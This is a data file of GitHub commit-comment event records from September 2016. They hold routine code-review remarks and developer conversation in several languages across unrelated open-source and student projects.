{"id":"4590592726","type":"CommitCommentEvent","actor":{"login":"ManuMbengiwazitungongi"},"repo":{"name":"ManuMbengiwazitungongi/MBENGIMBENGI"},"payload":{"comment":{"id":19098649,"position":null,"line":null,"path":null,"commit_id":"6deb023e0541b145f7cbb7cc2867e68148743573","created_at":"2016-09-20T15:51:47Z","updated_at":"2016-09-20T15:51:47Z","body":"zichzelpresentatie"}},"created_at":"2016-09-20T15:51:47Z"}
{"id":"4590595784","type":"CommitCommentEvent","actor":{"login":"forno"},"repo":{"name":"CIR-KIT/fifth_robot_pkg"},"payload":{"comment":{"id":19098659,"position":null,"line":null,"path":null,"commit_id":"75c28562546c67ef3d61573fd5d50253da609b0e","created_at":"2016-09-20T15:52:14Z","updated_at":"2016-09-20T15:52:14Z","body":"@yasu80 メールで送ってきたやつ全く読めないんだぜ"}},"created_at":"2016-09-20T15:52:14Z"}
{"id":"4590596087","type":"CommitCommentEvent","actor":{"login":"mrclay"},"repo":{"name":"hypeJunction/hypeWall"},"payload":{"comment":{"id":19098661,"position":6,"line":233,"path":"views/default/js/framework/wall/lib.js","commit_id":"3712ff32bb64fc5ec74ef7558edd9c10d760be5d","created_at":"2016-09-20T15:52:16Z","updated_at":"2016-09-20T15:52:16Z","body":"I think you forgot `.length` here. Just stopping by!"}},"created_at":"2016-09-20T15:52:16Z"}
{"id":"4590598203","type":"CommitCommentEvent","actor":{"login":"No1KnowMe"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19098667,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-20T15:52:35Z","updated_at":"2016-09-20T15:52:35Z","body":"Lol , i spend 3 day thinking about how to fix this tweak. I want it. I NEED IT! 👍  Nice work ! Contact me : signori.andrea@icloud.com "}},"created_at":"2016-09-20T15:52:35Z"}
{"id":"4590599916","type":"CommitCommentEvent","actor":{"login":"kamarush"},"repo":{"name":"kamarush/android_device_lge_hammerhead"},"payload":{"comment":{"id":19098671,"position":null,"line":null,"path":null,"commit_id":"bbb0d1efd2ec15dec3e0c3eefe58b99708cb869b","created_at":"2016-09-20T15:52:50Z","updated_at":"2016-09-20T15:52:50Z","body":"With this the problem should be gone. But other still persist. There is a glitch in 1080p video recording. Need to update the camera HAL, or replace aosp/google camera with SnapdragonCamera."}},"created_at":"2016-09-20T15:52:50Z"}
{"id":"4590601571","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19098675,"position":68,"line":68,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/BaseMatcher.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-20T15:53:06Z","updated_at":"2016-09-20T15:53:06Z","body":"For the same reason, I think we should add the synchronized block to `setMessageExchangeStore`\r\nIf we do that we don't need an atomicBoolean anymore. (Same thing for setters in InMemoryMessageExchangeStore`)\r\n(Atomic boolean in not needed anymore for CropRotation and SweepDeduplicator)"}},"created_at":"2016-09-20T15:53:06Z"}
{"id":"4590604405","type":"CommitCommentEvent","actor":{"login":"sdeleuze"},"repo":{"name":"sdeleuze/spring-framework"},"payload":{"comment":{"id":19098682,"position":79,"line":77,"path":"spring-web/src/main/java/org/springframework/http/codec/AbstractServerHttpMessageWriter.java","commit_id":"b17f596f60fac7af458e6cf5b3cfcb911d0c3744","created_at":"2016-09-20T15:53:30Z","updated_at":"2016-09-20T15:53:30Z","body":"I did the modification : https://github.com/spring-projects/spring-framework/commit/f918a2b192fcd46ab4090fca68fa6156f13d4c65"}},"created_at":"2016-09-20T15:53:30Z"}
{"id":"4590606775","type":"CommitCommentEvent","actor":{"login":"mateuspatricio"},"repo":{"name":"Ensembl/ensembl-compara"},"payload":{"comment":{"id":19098693,"position":5,"line":1572,"path":"modules/Bio/EnsEMBL/Compara/PipeConfig/ProteinTrees_conf.pm","commit_id":"baa8332b72ce040c2e89218dcadf0736be4ccf3c","created_at":"2016-09-20T15:53:53Z","updated_at":"2016-09-20T15:53:53Z","body":"I initially had a few unsuccessful tries with 250Mb, 500Mb and then 1Gb. So I decided to give a more RAM perhaps a bit too much.\r\nI just checked the job and it actually used 901Mb RAM and 1019Mb Swap. I'm not sure why it failed with 1Gb.\r\nI'll reduce that to 2Gb."}},"created_at":"2016-09-20T15:53:53Z"}
{"id":"4590607113","type":"CommitCommentEvent","actor":{"login":"yasu80"},"repo":{"name":"CIR-KIT/fifth_robot_pkg"},"payload":{"comment":{"id":19098696,"position":null,"line":null,"path":null,"commit_id":"75c28562546c67ef3d61573fd5d50253da609b0e","created_at":"2016-09-20T15:53:55Z","updated_at":"2016-09-20T15:53:55Z","body":"これはひどい\r\nちなみにClawsMailから試しに返信を飛ばしてみたんですが\r\n開けてみたらガンギマリメッセージになってましたの巻\r\nエンコード設定が死んでる...?\r\n\r\nいまブラウザから投げてるのでこっちは見れるかなと\r\n\r\n原文:\r\n>おそまきながらmergeしました.\r\n>\r\n>回路の話でコントローラの仕様は書くことではないかもしれません\r\n>ですが近いところにあるものですし,あっても損はないので迷ったら書いてけばいいと思って残してあります.\r\n"}},"created_at":"2016-09-20T15:53:55Z"}
{"id":"4590607508","type":"CommitCommentEvent","actor":{"login":"kerphi"},"repo":{"name":"ezpaarse-project/ezpaarse-platforms"},"payload":{"comment":{"id":19098698,"position":null,"line":null,"path":null,"commit_id":"f2087353546cb90021a4069c5094b0b6d942376a","created_at":"2016-09-20T15:53:59Z","updated_at":"2016-09-20T15:53:59Z","body":"Pour une meilleur lisibilité tu peux aligner les valeur après les \"=\" ce qui donnerait :\r\n```javascript\r\n    info                    = match[2].split('.');\r\n    result.publication_date = info[1];\r\n    result.title_id         = info[0];\r\n    result.doi              = '10.1515/' + match[3];\r\n    result.unitid           = match[2];\r\n    result.mime             = 'PDF';\r\n    result.rtype            = 'ARTICLE';\r\n```"}},"created_at":"2016-09-20T15:53:59Z"}
{"id":"4590608830","type":"CommitCommentEvent","actor":{"login":"Maxr1998"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19098702,"position":5,"line":182,"path":"app/src/main/java/tk/wasdennnoch/androidn_ify/systemui/notifications/NotificationHooks.java","commit_id":"b85c10bf01ef4711716430a559f2e705145daf05","created_at":"2016-09-20T15:54:11Z","updated_at":"2016-09-20T15:54:11Z","body":"That's why so many hated them back then :P"}},"created_at":"2016-09-20T15:54:11Z"}
{"id":"4590609225","type":"CommitCommentEvent","actor":{"login":"hypeJunction"},"repo":{"name":"hypeJunction/hypeWall"},"payload":{"comment":{"id":19098703,"position":6,"line":233,"path":"views/default/js/framework/wall/lib.js","commit_id":"3712ff32bb64fc5ec74ef7558edd9c10d760be5d","created_at":"2016-09-20T15:54:14Z","updated_at":"2016-09-20T15:54:14Z","body":"Thanks, fixed. \r\nI need to clean up and remove all the legacy code."}},"created_at":"2016-09-20T15:54:14Z"}
{"id":"4590609319","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19098704,"position":44,"line":46,"path":"01-JS-DOM-APIs/assets/scripts.js","commit_id":"3f0f085b55a8a0cc1d9c74eade55438885e33b8c","created_at":"2016-09-20T15:54:14Z","updated_at":"2016-09-20T15:54:14Z","body":"Rename this method to something more meaningful. The same with the parameter"}},"created_at":"2016-09-20T15:54:14Z"}
{"id":"4590611473","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19098710,"position":45,"line":47,"path":"01-JS-DOM-APIs/assets/scripts.js","commit_id":"3f0f085b55a8a0cc1d9c74eade55438885e33b8c","created_at":"2016-09-20T15:54:34Z","updated_at":"2016-09-20T15:54:34Z","body":"add space after `for`"}},"created_at":"2016-09-20T15:54:34Z"}
{"id":"4590611810","type":"CommitCommentEvent","actor":{"login":"YamaCIR-KIT"},"repo":{"name":"CIR-KIT/fifth_robot_pkg"},"payload":{"comment":{"id":19098712,"position":null,"line":null,"path":null,"commit_id":"75c28562546c67ef3d61573fd5d50253da609b0e","created_at":"2016-09-20T15:54:37Z","updated_at":"2016-09-20T15:54:37Z","body":"文字エンコード何だったのか教えてくれ\r\n気になって眠れないんだが"}},"created_at":"2016-09-20T15:54:37Z"}
{"id":"4590612202","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19098714,"position":null,"line":null,"path":null,"commit_id":"d50342c5fa2b10a4571876053a30f9106fb00d3a","created_at":"2016-09-20T15:54:40Z","updated_at":"2016-09-20T15:54:40Z","body":"Done in 2e9d367963d3d466161b3e6768eb3bb5d1a1411f.\r\nI did not realize this was loading Encoding instances eagerly at the time of commit."}},"created_at":"2016-09-20T15:54:40Z"}
{"id":"4590614535","type":"CommitCommentEvent","actor":{"login":"RahS12"},"repo":{"name":"RahS12/gitTest"},"payload":{"comment":{"id":19098722,"position":null,"line":null,"path":null,"commit_id":"5d7c945fea152d56edc50c8363c5f8002888663a","created_at":"2016-09-20T15:55:02Z","updated_at":"2016-09-20T15:55:02Z","body":"added"}},"created_at":"2016-09-20T15:55:02Z"}
{"id":"4590615945","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"ezpaarse-project/ezpaarse-platforms"},"payload":{"comment":{"id":19098724,"position":null,"line":null,"path":null,"commit_id":"f2087353546cb90021a4069c5094b0b6d942376a","created_at":"2016-09-20T15:55:14Z","updated_at":"2016-09-20T15:55:14Z","body":"En même temps, il me semble que par défaut, eslint râle quand on fait ça."}},"created_at":"2016-09-20T15:55:14Z"}
{"id":"4590617271","type":"CommitCommentEvent","actor":{"login":"FreakofKnuth"},"repo":{"name":"whiskeyromeo/CommunityQuestionAnswering"},"payload":{"comment":{"id":19098728,"position":96,"line":96,"path":"vomitRepo/whiskeyPrimer2.py","commit_id":"a4e48129d57cf471fd7f81be7fbcc07096055079","created_at":"2016-09-20T15:55:27Z","updated_at":"2016-09-20T15:55:27Z","body":"# Data for English sentence tokenizer"}},"created_at":"2016-09-20T15:55:27Z"}
{"id":"4590617513","type":"CommitCommentEvent","actor":{"login":"forno"},"repo":{"name":"CIR-KIT/fifth_robot_pkg"},"payload":{"comment":{"id":19098729,"position":null,"line":null,"path":null,"commit_id":"75c28562546c67ef3d61573fd5d50253da609b0e","created_at":"2016-09-20T15:55:29Z","updated_at":"2016-09-20T15:55:29Z","body":"ああ、えっと、プルリクを受け取ってくれるのはうれしいんだけど、\r\ndevelopからfig-pow-supply-patchにマージする必要はなくて\r\nfig-pow-supply-patchからdevelopへのプルリクをそのまま受け取ってくれたらよかったんだぜって話"}},"created_at":"2016-09-20T15:55:29Z"}
{"id":"4590618208","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"avmss3101/EDL"},"payload":{"comment":{"id":19098733,"position":null,"line":null,"path":null,"commit_id":"cc1bb3525deb12db6fcd8d1b563b46bb372fe283","created_at":"2016-09-20T15:55:36Z","updated_at":"2016-09-20T15:55:36Z","body":"O trabalho ainda está bem incompleto. Favor ler o enunciado da tarefa."}},"created_at":"2016-09-20T15:55:36Z"}
{"id":"4590618549","type":"CommitCommentEvent","actor":{"login":"Kosio996"},"repo":{"name":"Kosio996/FirstRepository"},"payload":{"comment":{"id":19098734,"position":3,"line":1,"path":"test.txt","commit_id":"1de05e1c525bace45f2e9840f33012e1399892ed","created_at":"2016-09-20T15:55:39Z","updated_at":"2016-09-20T15:55:39Z","body":"Hihihi\r\n"}},"created_at":"2016-09-20T15:55:39Z"}
{"id":"4590623534","type":"CommitCommentEvent","actor":{"login":"RafalSkolasinski"},"repo":{"name":"basnijholt/hpc05"},"payload":{"comment":{"id":19098743,"position":null,"line":null,"path":null,"commit_id":"4e433935261e1d54fc71de9fa74f4552b5c224ac","created_at":"2016-09-20T15:56:24Z","updated_at":"2016-09-20T15:56:24Z","body":"Could you make a ``changelog``? I don't know what version 1.1 brings."}},"created_at":"2016-09-20T15:56:24Z"}
{"id":"4590625042","type":"CommitCommentEvent","actor":{"login":"kerphi"},"repo":{"name":"ezpaarse-project/ezpaarse-platforms"},"payload":{"comment":{"id":19098748,"position":null,"line":null,"path":null,"commit_id":"f2087353546cb90021a4069c5094b0b6d942376a","created_at":"2016-09-20T15:56:38Z","updated_at":"2016-09-20T15:56:38Z","body":"Il me semble que @nojhamster a désactivé le paramètre qui fait cette vérification coté eslint pour justement permettre d'améliorer la lisibilité sur les \"=\" ?"}},"created_at":"2016-09-20T15:56:38Z"}
{"id":"4590629109","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19098757,"position":8,"line":8,"path":"01-JS-DOM-APIs/ex12/index.html","commit_id":"9fa0acf8d12adb0c31f7aadff7cd434e0aebfa51","created_at":"2016-09-20T15:57:15Z","updated_at":"2016-09-20T15:57:15Z","body":"Move this script to a `js` file."}},"created_at":"2016-09-20T15:57:15Z"}
{"id":"4590631364","type":"CommitCommentEvent","actor":{"login":"vlj91"},"repo":{"name":"alces-software/clusterware-services"},"payload":{"comment":{"id":19098761,"position":9,"line":72,"path":"gridscheduler/docs/guides/05-run-jobs.md","commit_id":"631ea963a586493fca8e0d51e450313cfda3ea4b","created_at":"2016-09-20T15:57:37Z","updated_at":"2016-09-20T15:57:37Z","body":"This should probably change to \"hours\"! :horse:"}},"created_at":"2016-09-20T15:57:37Z"}
{"id":"4590633583","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19098764,"position":null,"line":null,"path":null,"commit_id":"3751dba760193dd02904bdbb0f5fa5c70498d49a","created_at":"2016-09-20T15:57:58Z","updated_at":"2016-09-20T15:57:58Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1076](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13682&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T15:57:58Z"}
{"id":"4590633590","type":"CommitCommentEvent","actor":{"login":"paceholder"},"repo":{"name":"MigFerreira/nodeeditor"},"payload":{"comment":{"id":19098765,"position":9,"line":65,"path":"src/FlowScene.cpp","commit_id":"9ebda26996a5a9a0b98f7b20abc06b58706df80b","created_at":"2016-09-20T15:57:58Z","updated_at":"2016-09-20T15:57:58Z","body":"Just for your information.\r\n\r\nThis is a tricky C++ thing.  The function lock() returns a temporary object ```std::shared<Node>```.\r\nYou can copy it to a local variable \r\n```std::shared_ptr<Node> node = ngo->node().lock();```\r\nIn this case the inner counter in ```node``` gets increment and everything works fine.\r\nTemporary object is destroyed (with decrementing the counter).\r\n\r\nAlternatively, you can bind it to  **const reference**\r\n```std::shared_ptr<Node> const & node = ngo->node().lock();```\r\nC++ guarantees that temporary object bound to the const ref will exist till the const ref goes out of scope.\r\n\r\nHowever binding a temporary object to the **non-const** reference is an error:\r\n```std::shared_ptr<Node>& node = ngo->node().lock();```\r\nAfter the temporary object is bound to the reference it is destroyed. Reference remains in an undefined state. It references a destroyed object.\r\n\r\nSee also: http://stackoverflow.com/questions/11560339/returning-temporary-object-and-binding-to-const-reference\r\n\r\nI will check a bit later why the code throws a segmentation fault."}},"created_at":"2016-09-20T15:57:58Z"}
{"id":"4590635029","type":"CommitCommentEvent","actor":{"login":"ichrispa"},"repo":{"name":"open62541/open62541"},"payload":{"comment":{"id":19098770,"position":31,"line":508,"path":"src/server/ua_services_nodemanagement.c","commit_id":"36f430eaccf3cc775f990c86b1d2b5f44dc2af00","created_at":"2016-09-20T15:58:11Z","updated_at":"2016-09-20T15:58:11Z","body":"Hi @jpfr,\r\n\r\nyou are quite right to nag about this - the error is on my side. The compiler assigned anything without a typedef BaseDataType instead of BaseVariableDataType. Hence I ended up with the wrong nodeclass here... \r\n\r\nI removed the conditionals in 7b85c0e and fixed the mistake in the proper place. Thanks for the nagging :+1: "}},"created_at":"2016-09-20T15:58:11Z"}
{"id":"4590636082","type":"CommitCommentEvent","actor":{"login":"mjtko"},"repo":{"name":"alces-software/clusterware-services"},"payload":{"comment":{"id":19098774,"position":9,"line":72,"path":"gridscheduler/docs/guides/05-run-jobs.md","commit_id":"631ea963a586493fca8e0d51e450313cfda3ea4b","created_at":"2016-09-20T15:58:21Z","updated_at":"2016-09-20T15:58:21Z","body":"I prefer mine. 🏇 \r\n\r\n;)"}},"created_at":"2016-09-20T15:58:21Z"}
{"id":"4590637011","type":"CommitCommentEvent","actor":{"login":"yasu80"},"repo":{"name":"CIR-KIT/fifth_robot_pkg"},"payload":{"comment":{"id":19098776,"position":null,"line":null,"path":null,"commit_id":"75c28562546c67ef3d61573fd5d50253da609b0e","created_at":"2016-09-20T15:58:30Z","updated_at":"2016-09-20T15:58:30Z","body":"On Tue, 20 Sep 2016 08:54:37 -0700\nYamaCIR-KIT <notifications@github.com> wrote:\n\n> 文字エンコード何だったのか教えてくれ\n> 気になって眠れないんだが\n> \n\nClaws Mail version 3.13.2\nのAutodetectモードでした, いまはUnicode UTF-8にしてます\n"}},"created_at":"2016-09-20T15:58:30Z"}
{"id":"4590639760","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19098783,"position":11,"line":11,"path":"01-JS-DOM-APIs/ex12/index.html","commit_id":"9fa0acf8d12adb0c31f7aadff7cd434e0aebfa51","created_at":"2016-09-20T15:58:56Z","updated_at":"2016-09-20T15:58:56Z","body":"You need to check if the DOM is ready before searching things inside it."}},"created_at":"2016-09-20T15:58:56Z"}
{"id":"4590639779","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"Birajhow/EDL"},"payload":{"comment":{"id":19098784,"position":null,"line":null,"path":null,"commit_id":"a493c5f013aac90b458c1bb267d2c530f28acbcd","created_at":"2016-09-20T15:58:56Z","updated_at":"2016-09-20T15:58:56Z","body":"obrigado"}},"created_at":"2016-09-20T15:58:56Z"}
{"id":"4590640682","type":"CommitCommentEvent","actor":{"login":"kolosek"},"repo":{"name":"Bassonlinho/fetch"},"payload":{"comment":{"id":19098786,"position":9,"line":8,"path":"app/controllers/tasks_controller.rb","commit_id":"89bd34eaa08637920e5eb23f664c17d9484c58a3","created_at":"2016-09-20T15:59:05Z","updated_at":"2016-09-20T15:59:05Z","body":"Da li treba da se ulazi u akciju kako bi se proverilo da li je user ulogovan? Da li to moze preko before_action-a?"}},"created_at":"2016-09-20T15:59:05Z"}
{"id":"4590641192","type":"CommitCommentEvent","actor":{"login":"jontrulson"},"repo":{"name":"intel-iot-devkit/upm"},"payload":{"comment":{"id":19098787,"position":null,"line":null,"path":null,"commit_id":"e679d40d44bd5fb4c71f8567bfe9ceb7f45c75c7","created_at":"2016-09-20T15:59:09Z","updated_at":"2016-09-20T15:59:09Z","body":"Hi,\r\nIf you look at the latest version of the source code, you should see one (in ASCII) in the header files showing you how to wire it up: https://github.com/intel-iot-devkit/upm/blob/master/src/ds18b20/ds18b20.hpp"}},"created_at":"2016-09-20T15:59:09Z"}
{"id":"4590642030","type":"CommitCommentEvent","actor":{"login":"treeowl"},"repo":{"name":"haskell/containers"},"payload":{"comment":{"id":19098792,"position":null,"line":null,"path":null,"commit_id":"30cee02e118ad67343834aed08c7e27b04858a31","created_at":"2016-09-20T15:59:16Z","updated_at":"2016-09-20T15:59:16Z","body":"Hrm... Actually, it might be possible after all, using a different type parameter than originally planned and an ad hoc, vaguely `Category`-like class."}},"created_at":"2016-09-20T15:59:16Z"}
{"id":"4590642215","type":"CommitCommentEvent","actor":{"login":"tasleson"},"repo":{"name":"cathay4t/libstoragemgmt"},"payload":{"comment":{"id":19098793,"position":null,"line":null,"path":null,"commit_id":"b0942e266e1b86ef5e50746f7f14f210f0f14dce","created_at":"2016-09-20T15:59:18Z","updated_at":"2016-09-20T15:59:18Z","body":"@cathay4t Where are we at with having py3 supported version of pywbem in fedora?"}},"created_at":"2016-09-20T15:59:18Z"}
{"id":"4590647436","type":"CommitCommentEvent","actor":{"login":"kolosek"},"repo":{"name":"Bassonlinho/fetch"},"payload":{"comment":{"id":19098809,"position":17,"line":18,"path":"app/controllers/application_controller.rb","commit_id":"89bd34eaa08637920e5eb23f664c17d9484c58a3","created_at":"2016-09-20T16:00:06Z","updated_at":"2016-09-20T16:00:06Z","body":"Zasto toliko && ? Da li je to dovoljno optimizovan kod? "}},"created_at":"2016-09-20T16:00:06Z"}
{"id":"4590650616","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19098814,"position":null,"line":null,"path":null,"commit_id":"6b4eaf94224c8c1bbf3019a3589e4b495c6fe8cb","created_at":"2016-09-20T16:00:32Z","updated_at":"2016-09-20T16:00:32Z","body":"I thought roomhelp had higher requirements..."}},"created_at":"2016-09-20T16:00:32Z"}
{"id":"4590651485","type":"CommitCommentEvent","actor":{"login":"kolosek"},"repo":{"name":"Bassonlinho/fetch"},"payload":{"comment":{"id":19098818,"position":10,"line":9,"path":"app/controllers/tasks_controller.rb","commit_id":"89bd34eaa08637920e5eb23f664c17d9484c58a3","created_at":"2016-09-20T16:00:40Z","updated_at":"2016-09-20T16:00:40Z","body":"Da li se ova pretraga moze negde drugde pomeriti?"}},"created_at":"2016-09-20T16:00:40Z"}
{"id":"4590654013","type":"CommitCommentEvent","actor":{"login":"AdamSupinski"},"repo":{"name":"AdamSupinski/WDTProject"},"payload":{"comment":{"id":19098829,"position":14,"line":67,"path":"src/main/java/asupinski/model/ExcelOperator.java","commit_id":"be18499afa4428e990d87766d955788c55a5d0d1","created_at":"2016-09-20T16:01:02Z","updated_at":"2016-09-20T16:01:02Z","body":"Dlaczego 'replaceFirst' a nie 'replaceAll'?"}},"created_at":"2016-09-20T16:01:02Z"}
{"id":"4590656558","type":"CommitCommentEvent","actor":{"login":"yasu80"},"repo":{"name":"CIR-KIT/fifth_robot_pkg"},"payload":{"comment":{"id":19098836,"position":null,"line":null,"path":null,"commit_id":"75c28562546c67ef3d61573fd5d50253da609b0e","created_at":"2016-09-20T16:01:26Z","updated_at":"2016-09-20T16:01:26Z","body":"On Tue, 20 Sep 2016 08:55:29 -0700\nDoi Yusuke <notifications@github.com> wrote:\n\n> ああ、えっと、プルリクを受け取ってくれるのはうれしいんだけど、\n> developからfig-pow-supply-patchにマージする必要はなくて\n> fig-pow-supply-patchからdevelopへのプルリクをそのまま受け取ってくれたらよかったんだぜって話\n> \n\n話の腰を折ってしまいましたね・・・わかりました.\ndevelopが本筋で, それに合流させるだけで良いのですね.\nそしてfig-pow-supply-patchはpatchの任を果たしたので消してしまいますね\n"}},"created_at":"2016-09-20T16:01:26Z"}
{"id":"4590657743","type":"CommitCommentEvent","actor":{"login":"kolosek"},"repo":{"name":"Bassonlinho/fetch"},"payload":{"comment":{"id":19098839,"position":5,"line":6,"path":"app/views/tasks/index.html.erb","commit_id":"89bd34eaa08637920e5eb23f664c17d9484c58a3","created_at":"2016-09-20T16:01:38Z","updated_at":"2016-09-20T16:01:38Z","body":"Samo ulogovani korisnik treba da vidi ovu stranicu. Provera ne treba da se desava u view-u."}},"created_at":"2016-09-20T16:01:38Z"}
{"id":"4590658672","type":"CommitCommentEvent","actor":{"login":"MasseGuillaume"},"repo":{"name":"lampepfl/dotty"},"payload":{"comment":{"id":19098845,"position":47,"line":47,"path":"bridge/src/main/scala/xsbt/CompilerClassLoader.scala","commit_id":"09b2f39731386cd5b3688d5c3badf75d956d4f6d","created_at":"2016-09-20T16:01:46Z","updated_at":"2016-09-20T16:01:46Z","body":"ahaha thanks !"}},"created_at":"2016-09-20T16:01:46Z"}
{"id":"4590662662","type":"CommitCommentEvent","actor":{"login":"kolosek"},"repo":{"name":"Bassonlinho/fetch"},"payload":{"comment":{"id":19098856,"position":30,"line":31,"path":"app/views/tasks/index.html.erb","commit_id":"89bd34eaa08637920e5eb23f664c17d9484c58a3","created_at":"2016-09-20T16:02:23Z","updated_at":"2016-09-20T16:02:23Z","body":"Da li ne ulogovani korisnik treba da ima pristup tasks indeks akciji? Da li treba da mu prikaze 'Register' kada dodje na tu stranicu po specifikaciji tog feature-a?"}},"created_at":"2016-09-20T16:02:23Z"}
{"id":"4590665096","type":"CommitCommentEvent","actor":{"login":"smarter"},"repo":{"name":"lampepfl/dotty"},"payload":{"comment":{"id":19098870,"position":47,"line":47,"path":"bridge/src/main/scala/xsbt/CompilerClassLoader.scala","commit_id":"09b2f39731386cd5b3688d5c3badf75d956d4f6d","created_at":"2016-09-20T16:02:49Z","updated_at":"2016-09-20T16:02:49Z","body":":)"}},"created_at":"2016-09-20T16:02:49Z"}
{"id":"4590666387","type":"CommitCommentEvent","actor":{"login":"mksarge"},"repo":{"name":"ubccpsc/classportal"},"payload":{"comment":{"id":19098873,"position":null,"line":null,"path":null,"commit_id":"b8929ee90f8ade8da2fe792a5adc28cdb2dda10d","created_at":"2016-09-20T16:03:00Z","updated_at":"2016-09-20T16:03:00Z","body":"Resolves #10."}},"created_at":"2016-09-20T16:03:00Z"}
{"id":"4590668526","type":"CommitCommentEvent","actor":{"login":"mateuspatricio"},"repo":{"name":"Ensembl/ensembl-compara"},"payload":{"comment":{"id":19098878,"position":5,"line":118,"path":"modules/Bio/EnsEMBL/Compara/PipeConfig/Parts/CAFE.pm","commit_id":"9b88fe4c850d99b677aa44804416ee4e1d558be2","created_at":"2016-09-20T16:03:20Z","updated_at":"2016-09-20T16:03:20Z","body":"In this particular case it has used 2.1Gb for only Sauropsids. I assumed it would need far more for other species set.\r\nI couldn't get the job status for the latest run of the Protein Tree pipeline.\r\nBut yes, it is probably too much, should we set it to 4Gb? Or revert it to 1Gb?"}},"created_at":"2016-09-20T16:03:20Z"}
{"id":"4590669575","type":"CommitCommentEvent","actor":{"login":"Garduna1976"},"repo":{"name":"TilesLocalization/resources"},"payload":{"comment":{"id":19098882,"position":null,"line":null,"path":null,"commit_id":"cb3f59c4ed6376e6ae9b1867a2579b25366c4fd3","created_at":"2016-09-20T16:03:30Z","updated_at":"2016-09-20T16:03:30Z","body":"Great! And some RastaGat? 😁\n\nOp 20 sep. 2016 5:46 p.m. schreef \"rascarlo\" <notifications@github.com>:\n\n> well we will soon get some root action!\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/TilesLocalization/resources/commit/cb3f59c4ed6376e6ae9b1867a2579b25366c4fd3#commitcomment-19098557>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVOo18Qr9UXlI526aHBk6-aB2hgd0QlQks5qr__agaJpZM4KBxrH>\n> .\n>\n"}},"created_at":"2016-09-20T16:03:30Z"}
{"id":"4590669553","type":"CommitCommentEvent","actor":{"login":"kolosek"},"repo":{"name":"Bassonlinho/fetch"},"payload":{"comment":{"id":19098883,"position":1,"line":1,"path":"app/views/tasks/update.js.erb","commit_id":"89bd34eaa08637920e5eb23f664c17d9484c58a3","created_at":"2016-09-20T16:03:31Z","updated_at":"2016-09-20T16:03:31Z","body":"Da li je If neophodan na nivou view-a ovde? Ili se ta provera moze pomeriti jedan korak iznad."}},"created_at":"2016-09-20T16:03:31Z"}
{"id":"4590671249","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"jeffersonccomp/EDL"},"payload":{"comment":{"id":19098886,"position":null,"line":null,"path":null,"commit_id":"d71b8566d893b4883a238a3f727b813effc26f92","created_at":"2016-09-20T16:03:47Z","updated_at":"2016-09-20T16:03:47Z","body":"Melhorou, mas o código fonte continua aparecendo esquisito. Procure sobre como exibir código fonte com o markdown.\r\nOutra coisa, mais importante, os exemplos que você está mostrando não são representativos. O que é especial em Python, o que a torna diferente de todas as outras linguagens. Discuta isso no artigo com exemplos."}},"created_at":"2016-09-20T16:03:47Z"}
{"id":"4590671482","type":"CommitCommentEvent","actor":{"login":"WSawicka"},"repo":{"name":"AdamSupinski/WDTProject"},"payload":{"comment":{"id":19098887,"position":14,"line":67,"path":"src/main/java/asupinski/model/ExcelOperator.java","commit_id":"be18499afa4428e990d87766d955788c55a5d0d1","created_at":"2016-09-20T16:03:49Z","updated_at":"2016-09-20T16:03:49Z","body":"Faktycznie, pomyłka. Dzięki"}},"created_at":"2016-09-20T16:03:49Z"}
{"id":"4590672185","type":"CommitCommentEvent","actor":{"login":"AdamSupinski"},"repo":{"name":"AdamSupinski/WDTProject"},"payload":{"comment":{"id":19098889,"position":61,"line":609,"path":"src/main/java/asupinski/controller/BasicDataOverviewController.java","commit_id":"be18499afa4428e990d87766d955788c55a5d0d1","created_at":"2016-09-20T16:03:57Z","updated_at":"2016-09-20T16:03:57Z","body":"Dlaczego powyższe linie zostały zakomentowane?"}},"created_at":"2016-09-20T16:03:57Z"}
{"id":"4590672768","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19098891,"position":null,"line":null,"path":null,"commit_id":"7e19227245fc63508f1f4fcfc1a83583abb3f7da","created_at":"2016-09-20T16:04:02Z","updated_at":"2016-09-20T16:04:02Z","body":"my bad :)"}},"created_at":"2016-09-20T16:04:02Z"}
{"id":"4590673798","type":"CommitCommentEvent","actor":{"login":"forno"},"repo":{"name":"CIR-KIT/fifth_robot_pkg"},"payload":{"comment":{"id":19098895,"position":null,"line":null,"path":null,"commit_id":"75c28562546c67ef3d61573fd5d50253da609b0e","created_at":"2016-09-20T16:04:13Z","updated_at":"2016-09-20T16:04:13Z","body":"もう消してるよ。　受け取ったところでブランチの責任者の私が消しておいた。"}},"created_at":"2016-09-20T16:04:13Z"}
